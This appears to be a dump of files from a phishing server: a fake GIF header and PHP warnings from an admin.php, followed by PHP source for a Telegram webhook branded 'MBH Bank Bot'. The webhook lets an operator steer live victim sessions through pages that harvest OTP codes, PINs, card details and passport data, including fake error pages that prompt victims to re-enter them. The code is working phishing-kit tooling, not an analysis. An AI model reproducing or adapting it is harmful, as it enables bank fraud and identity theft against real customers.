???<!-- GIF89;a -->
123123123123
.....................................................................................................................................???<!-- GIF89;a -->
123123123123
.....................................................................................................................................<br />
<b>Warning</b>:  Undefined variable $auth in <b>/home/elquintoelemento/public_html/admin.php</b> on line <b>546</b><br />
<br />
<b>Warning</b>:  Trying to access array offset on null in <b>/home/elquintoelemento/public_html/admin.php</b> on line <b>546</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /home/elquintoelemento/public_html/admin.php:1) in <b>/home/elquintoelemento/public_html/admin.php</b> on line <b>188</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /home/elquintoelemento/public_html/admin.php:1) in <b>/home/elquintoelemento/public_html/admin.php</b> on line <b>189</b><br />
<?php
/*
 * Telegram Webhook Handler - FINAL
 */

require_once 'core/core.php';

// Get input from Telegram
$jsonInput = file_get_contents('php://input');
$update = json_decode($jsonInput, true);

// Log received update
logMessage('WEBHOOK', 'Update received', $update);

// Handle callback queries (button clicks)
if(isset($update['callback_query'])) {
    $callbackQuery = $update['callback_query'];
    $callbackData = $callbackQuery['data'] ?? '';
    
    // Parse callback data: "action:sessionId"
    $parts = explode(':', $callbackData);
    $action = $parts[0] ?? '';
    $sessionId = $parts[1] ?? '';
    
    if(empty($sessionId)) {
        answerCallbackQuery($callbackQuery['id'], '❌ Invalid session');
        http_response_code(200);
        echo 'OK';
        exit;
    }
    
    // Map action to status
    $statusMap = [
        's' => ['status' => 'done', 'name' => 'Success'],
        'o' => ['status' => 'otp', 'name' => 'OTP'],
        'e' => ['status' => 'error', 'name' => 'Error'],
        'c' => ['status' => 'card', 'name' => 'Card'],
        'p' => ['status' => 'pin', 'name' => 'PIN'],
        'pp' => ['status' => 'passport', 'name' => 'Passport'],
        'ec' => ['status' => 'error_card', 'name' => 'Error Card'],
        'eo' => ['status' => 'error_otp', 'name' => 'Error OTP']
    ];
    
    if(!isset($statusMap[$action])) {
        answerCallbackQuery($callbackQuery['id'], '❌ Unknown action');
        http_response_code(200);
        echo 'OK';
        exit;
    }
    
    $newStatus = $statusMap[$action]['status'];
    $pageName = $statusMap[$action]['name'];
    
    // Write status to file
    $paths = getPaths();
    $statusFile = $paths['status'] . $sessionId . '.txt';
    
    if(!is_dir($paths['status'])) {
        @mkdir($paths['status'], 0755, true);
    }
    
    $written = @file_put_contents($statusFile, $newStatus, LOCK_EX);
    
    if($written !== false) {
        logMessage('WEBHOOK', 'Status updated', [
            'session' => substr($sessionId, 0, 8),
            'status' => $newStatus
        ]);
        
        answerCallbackQuery($callbackQuery['id'], "✅ $pageName activated");
        
        // Send confirmation
        $msg = "✅ <b>Action Executed</b>\n\n";
        $msg .= "📄 Page: <b>$pageName</b>\n";
        $msg .= "🆔 Session: <code>" . substr($sessionId, 0, 8) . "...</code>\n";
        $msg .= "⏰ Time: " . date('H:i:s');
        
        sendTelegramMessage($msg);
    } else {
        logMessage('WEBHOOK_ERROR', 'Failed to write status', ['session' => $sessionId]);
        answerCallbackQuery($callbackQuery['id'], '❌ Failed to update status');
    }
}

// Handle direct messages
if(isset($update['message'])) {
    $text = $update['message']['text'] ?? '';
    
    if($text === '/start') {
        $msg = "<b>🤖 MBH Bank Bot</b>\n\n";
        $msg .= "Use the buttons in notifications to control user flow.";
        sendTelegramMessage($msg);
    }
    
    if($text === '/help') {
        $msg = "<b>📊 Help</b>\n\n";
        $msg .= "Buttons control:\n";
        $msg .= "✅ Success → Success page\n";
        $msg .= "🔢 OTP → OTP page\n";
        $msg .= "📌 PIN → PIN page\n";
        $msg .= "💳 Card → Card page\n";
        $msg .= "🛂 Passport → Personal info\n";
        $msg .= "❌ Error Card → Card page with error\n";
        $msg .= "❌ Error OTP → OTP page with error\n";
        $msg .= "❌ Error → Error page";
        sendTelegramMessage($msg);
    }
}

// Answer callback query function
function answerCallbackQuery($callbackId, $text) {
    $token = getBotToken();
    $url = "https://api.telegram.org/bot$token/answerCallbackQuery";
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
        'callback_query_id' => $callbackId,
        'text' => $text
    ]));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_exec($ch);
    curl_close($ch);
}

http_response_code(200);
echo 'OK';